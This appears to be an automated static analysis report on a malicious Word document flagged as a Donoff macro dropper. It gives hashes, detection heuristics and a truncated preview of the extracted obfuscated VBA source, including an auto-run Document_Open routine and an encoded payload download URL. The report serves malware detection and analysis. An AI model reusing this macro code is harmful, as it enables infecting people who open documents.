Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ca102b7fa52268c…

MALICIOUS

Office (OLE)

101.5 KB Created: 2016-05-31 21:49:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 4037472adbd6c4a6d971ce40467f0e28 SHA-1: 42bb8411a62c7d695aa5c53f37030ee875c111db SHA-256: 6ca102b7fa52268cc687bce258209b5c3aa806215cd4b8fc2c9caabd5e8fa314
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of a Document_Open macro and multiple high-severity VBA heuristics (CreateObject, CallByName, p-code auto-execution) strongly indicate malicious VBA code execution. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' further supports this, suggesting the file acts as a dropper. The VBA code itself is heavily obfuscated, preventing a detailed analysis of its specific actions, but the overall pattern points to a macro-based downloader.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19124 bytes
SHA-256: e7660d8edaddb4429e65ac0c54135c23db3ede8a7002436bc88cf26f3a0bd254
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub uGJawhoPl(ByVal DkzEbBO As String, ByVal jzVdFNMkiT As Integer)
aCaLm True, "RsFG3hVPgllMN5A4ZpCpa8pIQjkJU", 9044
mLQsxUPPTJ "egrMfXGIi0VoevHdTPVxXa6YJke2Q1zz", "SBmmrkh9RUyQMITRjxxGQ0kmz1486ZxL"
zHfiyGDEUev
GcjMk = 6741
If WdUmxffP("Rot743J4TT7P2mUfGzDpTC7Sd", 886, 440) Then
fxCnaGxZb = 9024
OPDnEP
dDBjDHligGEZ 1883
jrPEqOJDZbQZ = 3192
AjCcpoCuFnEwuT "z4vlidUCRHOjjYk2hMSILqNxjL"
DWfWT = "QTivYTBreGNCaTBi1HOe"
Else
BBlYIUHenuxdL 653, 5024, 4694
OSheObzblV "tOTyGb7n6HRXUpvTSPzNEzXA6h", 9258
NgDvqDA
fwxTALCtkYPSe = False
End If
End Sub
Private Sub kfuqEWKlk(ByVal IrnBoZayGBR As Integer)
kMPlaaVbDKFpE "mQc264z2T8rPMpHprMTKKf3ziSW7IK", "jyBkcb0PdKCjVglUyi", "9c9mxfsZS9GJoXFofa2F72SperdSp7CzN"
KanKdyJYL = 358
ktcpf
PcUqcKhpXU = "a7AEiWudr2w5WGNkgZs"
If tJIJFldHujB(True, 55, True) Then
WZYWs = 4069
ERsznkBiazyS 555, "jaubWPnLpeqgVNL9ME84XxXJJITj5FQ6p", 2131
VXzDeZQUOWBeoG = "Xy5MIxz7AEDrQ7E3hZLqqGEl0"
RqLiAiQrLZLf
Else
ESReOSNOqIv
PKUilaCSBqqupr 9355
NMNeFRDkkVG = "TSsXKofssPzAHsqQUETEn54ybsC5bha"
End If
End Sub
Private Sub Document_Open()
Dim ywYJqwjKpOFbtW As Integer
Dim BGpbdbRp As Boolean
ghHmpSVswVcRd.jxKDs
End Sub

Attribute VB_Name = "ghHmpSVswVcRd"
Private Sub lCTKxpVdhNsq(ByVal dQzPQdsjeQOzE As String, ByVal ftmtlcMHVjSLs As String)
GFHzDHDgei "MsvPxro6k9JhO0TbtCPPDuLKRzBM"
dETXBUnuHn = "cJsS44dr0kH2evGmEjrf"
HLpczTXnnV "icWB3QYURqVDed0s5pyB97w", "zHLmEEuWX7jTsXpKyGyo8fksDnm", True
End Sub
Private Sub YBRtAfkz(ByVal jBdJOHN As Integer, ByVal ujcCQW As String)
bXiJXdnXpSOuER 3110
mSIrt = 6371
qQmaFqqVIfyDJG "v6ZjcNChcCAbA756GvWMTik9CMlT", "AHTeso1D3mt9vDnjmjbPIQmojxZg"
gthNQnYcV = True
krhAqu
End Sub
Private Sub LUgAPO(ByVal lxSrxsUMMCsNBS As String, ByVal QpCXYcDFDLKcA As Boolean)
KBsrfXwNpP
eInxfoau
DhniWMsUdDqG
End Sub
Public Function bFyULe(ByVal slcZsor As String, ByVal KwrUqzsvJLolM As String) As Object
Dim JeYUFcs As Integer
Dim PbZHGfpAAsEy As String
Set bFyULe = LBlKbwunk(CreateObject(slcZsor))
End Function
Public Sub jxKDs()
Dim NHWwZtzFoGH As String
Dim qPHmZLhtuqE As Integer
On Error GoTo frHuwhIAGMJv
LsjLKNYlSkK.edvyADiLxt
LsjLKNYlSkK.eYlMAwjMYvXey
zYUaYgWO
Exit Sub
frHuwhIAGMJv:
End Sub
Private Sub zcQbFtuwKd(ByVal nInHxSIkGpqB As String)
EnuFJzceumOZPS = "pJLxrKJz9S02hq7DyTgnvlkpG"
If qcUOZZOsrnm Then
DyWUZwc False, "zTP72EaAEu1Z98IqCpAb2Zpx"
wSYCpRRKN
xXmqlMjVYHYg True
Else
uQzfSi 2123
End If
BGETg "mgNM7T5AJoOh3ZfdLDJ67n", 972
End Sub
Private Function LBlKbwunk(ByVal JZHdouWIY As Object) As Object
Dim WzFxigbLicP As Integer
Set LBlKbwunk = JZHdouWIY
End Function
Private Sub WbntgcNCat(ByVal AzDOJUo As String, ByVal IOlUpBYWm As String, ByVal mKFvPAtxHqhrs As String)
Set eVaUzTJ = KznlPEmuafBuL.sOuLR(True, mKFvPAtxHqhrs)
KznlPEmuafBuL.qxMjgLZZie JDjVYEhjIGYlV, 2670, "FxPPgcVqBRHoZgW6cgonHfmHuaBsT", eVaUzTJ
wONyMkmVlhpHC.GIPAak LGNpwJse.CdLCElatFIApo(CHSpBhbbIcQ, eVaUzTJ, 8879), False, "SLhD3p4tO1joUata7mBo3o", AzDOJUo
End Sub
Private Sub zYUaYgWO()
Dim tKoax As Boolean
WbntgcNCat wONyMkmVlhpHC.pPPsRgLwu, "iq1VrlX3DXmVACFs475taCI1UR", vpJmyxet
wONyMkmVlhpHC.wbbJzsoNxEEk False, 618, wONyMkmVlhpHC.pPPsRgLwu
End Sub
Private Function JDjVYEhjIGYlV() As String
JDjVYEhjIGYlV = lWKoEyBev.LMxEWodRNey("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function CHSpBhbbIcQ() As String
CHSpBhbbIcQ = lWKoEyBev.LMxEWodRNey("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function vpJmyxet() As String
vpJmyxet = lWKoEyBev.LMxEWodRNey("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "lWKoEyBev"
Private Function jCzCidQYfBv(ByVal mJtdBscGjpHLkG As Integer, ByVal dqrmmKGXEhnRYQ As Intege
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.